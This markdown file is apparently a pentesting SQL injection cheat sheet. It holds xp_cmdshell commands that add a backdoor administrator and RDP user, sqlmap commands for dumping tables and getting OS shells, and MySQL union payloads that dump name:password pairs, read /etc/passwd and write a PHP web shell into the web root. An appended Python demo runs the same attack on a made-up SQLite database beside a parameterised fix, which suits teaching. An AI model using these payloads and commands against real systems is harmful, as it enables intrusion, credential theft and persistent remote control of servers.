0-SQL-Injection.md

File metadata and controls

160 lines (107 loc) · 3.09 KB

SQL Injection

Sqsh

Interactive command-line client for MS SQL Server (and Sybase), built on FreeTDS

Login

sqsh -S <ip>:<port> -U sa -P password

Leave out -P to be prompted for the password instead of putting it on the command line, where it ends up in shell history and the process list.

Commands (sqsh sends a batch when you type go on its own line)

exec xp_cmdshell 'whoami'
go
exec xp_cmdshell 'net user kalisa pass /add'
go
exec xp_cmdshell 'net localgroup Administrators kalisa /add'
go
exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add'
go

xp_cmdshell is disabled by default on SQL Server 2005 and later; enabling it (via sp_configure) and calling it both require the sysadmin role, which sa has. The commands run as the SQL Server service account, so the net user / net localgroup lines only succeed when that account is a local administrator.

SQLMap

Basic scan

sqlmap -u "http://example.com/login.php"

sqlmap needs a parameter to test: put one in the URL (for example ?id=1) or, for a form, supply the request body with --data. A bare URL with no parameters gives it nothing to inject into.

List all databases at the site

sqlmap -u "http://example.com/login.php" --dbs

List all tables in a specific database

sqlmap -u "http://example.com/login.php" -D db_name --tables

Dump the contents of a DB table

sqlmap -u "http://example.com/login.php" -D db_name -T table_name --dump

List all columns in a table

sqlmap -u "http://example.com/login.php" -D db_name -T table_name --columns

Dump only selected columns

sqlmap -u "http://example.com/login.php" -D db_name -T users -C username,password --dump

Dump a table through a POST form (the body goes in --data; sqlmap tests each field in it, here with the form filled in as admin/admin)

sqlmap -u "http://example.com/login.php" --method "POST" --data "username=admin&password=admin&submit=Submit" -D db_name -T table_name --dump

Get OS shell (on MySQL this works by writing a web stager into the web root, so it needs the FILE privilege and a guessable document root; --dbms skips the fingerprinting step)

sqlmap --dbms=mysql -u "http://example.com/login.php" --os-shell

Get SQL Shell

sqlmap --dbms=mysql -u "http://example.com/login.php" --sql-shell

SQL injection cheat sheet (MySQL, union-based)

Check for SQL injection

?id=1'

A stray single quote that produces a database error or changes the page means the value reaches the query unescaped.

Find the number of columns

?id=1 order by 9 -- -

Raise the number until the query errors; the largest value that still works is the column count. The trailing -- - comments out the rest of the original query (MySQL requires a space after --, and the extra - stops that space from being trimmed).

Find which columns are reflected in the page

?id=1 union select 1,2,3,4,5,6,7,8,9 -- -

The numbers that show up in the response mark the positions whose contents are displayed; put the data you want in one of those (column 5 in the examples below).

Get username of the sql-user

?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -

Get version

?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -

Get all tables (information_schema.tables also lists the system schemas; the application's tables are usually the ones that are not from mysql, information_schema or performance_schema)

?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -

Get all columns from a specific table

?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -

Get the name and password columns from the users table. (0x3a is ':' and only serves as a delimiter between name and password.)

?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 from users -- -

Read a file (needs the MySQL FILE privilege, and fails when secure_file_priv does not allow the path)

?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -

Write a file and read it back to confirm it was created (same FILE privilege; the directory must be writable by the mysqld user)

?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -

Write a PHP web shell into the web root (double quotes around cmd so nothing has to be escaped inside the single-quoted SQL string)

?id=1 union select null,null,null,null,'<?php system($_GET["cmd"]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -

Then open it in the browser and check that commands execute

http://<ip>/shell.php?cmd=id
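The steps above, from the quote probe through to dumping name:password pairs, run end to end against a constructed in-memory SQLite database. This is an added example, not code from the original cheat sheet: the tables (products, users), the sample rows, and the toy page that reflects only the name column are all made up for the demonstration. SQLite is used so it runs offline; it differs from the MySQL payloads above only in catalog names (sqlite_master and pragma_table_info instead of information_schema) and the string-concatenation operator (|| instead of concat()). The vulnerable string-built query sits beside its parameterised fix so the same payload can be seen failing against it. The file read/write steps are MySQL-specific (FILE privilege) and are not covered.

```python
"""Union-based SQL injection walked through against a constructed SQLite database.

Added example for the cheat sheet above; not part of the original page.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema and rows: the app exposes products, the target is users."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER, name TEXT, price INTEGER, category TEXT);
        INSERT INTO products VALUES (1, 'widget', 10, 'tools'), (2, 'gadget', 25, 'tools');
        CREATE TABLE users (id INTEGER, name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr3t'), (2, 'bob', 'hunter2');
        """
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """The bug the cheat sheet exploits: the ?id= value is pasted into the SQL text."""
    sql = f"SELECT id, name, price, category FROM products WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """Hardened form: the value is bound as a parameter and can never become SQL."""
    sql = "SELECT id, name, price, category FROM products WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()


def render_page(rows: list) -> list:
    """Toy page template: only column 2 (the product name) reaches the HTML."""
    return [str(row[1]) for row in rows]


def is_injectable(conn: sqlite3.Connection) -> bool:
    """?id=1'  : a database error on a stray quote means the value reaches the parser."""
    try:
        vulnerable_lookup(conn, "1'")
    except sqlite3.OperationalError:
        return True
    return False


def find_column_count(conn: sqlite3.Connection, max_cols: int = 20) -> int:
    """?id=1 order by N -- -  : the first N that errors is one past the column count."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"1 order by {n} -- -")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("more than max_cols columns")


def find_reflected_slot(conn: sqlite3.Connection, ncols: int) -> int:
    """?id=-1 union select 1,2,3,4 -- -  : whichever marker shows up is a usable slot.
    -1 matches no real row, so only the injected row comes back."""
    markers = [str(i) for i in range(1, ncols + 1)]
    page = render_page(vulnerable_lookup(conn, f"-1 union select {','.join(markers)} -- -"))
    for slot, marker in enumerate(markers):
        if marker in page:
            return slot
    raise RuntimeError("no column is reflected in the page")


def union_extract(conn: sqlite3.Connection, ncols: int, slot: int, expr: str, from_clause: str = "") -> list:
    """Put an arbitrary expression in the reflected slot and read it off the page."""
    slots = [str(i) for i in range(1, ncols + 1)]
    slots[slot] = expr
    payload = f"-1 union select {','.join(slots)} {from_clause} -- -"
    return sorted(render_page(vulnerable_lookup(conn, payload)))


def demo() -> dict:
    """Runs the cheat sheet's steps in order and returns what each one yielded."""
    conn = make_db()
    ncols = find_column_count(conn)           # order by probing
    slot = find_reflected_slot(conn, ncols)   # union select 1,2,3,4
    return {
        "injectable": is_injectable(conn),
        "ncols": ncols,
        "slot": slot,
        "version": union_extract(conn, ncols, slot, "sqlite_version()"),
        # information_schema.tables equivalent
        "tables": union_extract(conn, ncols, slot, "name", "from sqlite_master where type = 'table'"),
        # information_schema.columns where table_name = 'users' equivalent
        "columns": union_extract(conn, ncols, slot, "name", "from pragma_table_info('users')"),
        # concat(name, 0x3a, password) equivalent
        "creds": union_extract(conn, ncols, slot, "name || ':' || password", "from users"),
        # the same payload against the parameterised query is just a non-numeric id: no rows
        "safe": safe_lookup(conn, "-1 union select 1,2,3,4 -- -"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it with python3 and compare the "creds" line with the "safe" line: the union payload that dumps admin:s3cr3t from the string-built query returns nothing from the parameterised one, because the bound value is compared to the id column as data rather than parsed as SQL.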